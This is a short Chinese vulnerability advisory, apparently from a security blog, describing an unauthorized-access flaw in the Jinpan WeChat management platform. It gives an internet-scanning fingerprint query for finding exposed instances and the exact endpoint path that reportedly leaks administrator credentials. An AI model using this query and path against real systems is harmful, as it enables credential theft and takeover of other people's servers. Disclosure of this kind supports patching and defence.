金盘 微信管理平台 getsysteminfo 未授权访问漏洞

漏洞描述

金盘 微信管理平台 getsysteminfo接口存在未授权访问漏洞,攻击者通过漏洞可以获取账号密码信息,获取后台管理员权限。

漏洞影响

金盘 微信管理平台

网络测绘

title=”微信管理后台” && icon_hash=”116323821″

漏洞复现

登陆页面

20241226142122210-png (24)

验证POC

/admin/weichatcfg/getsysteminfo

20241226142147328-png (25)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容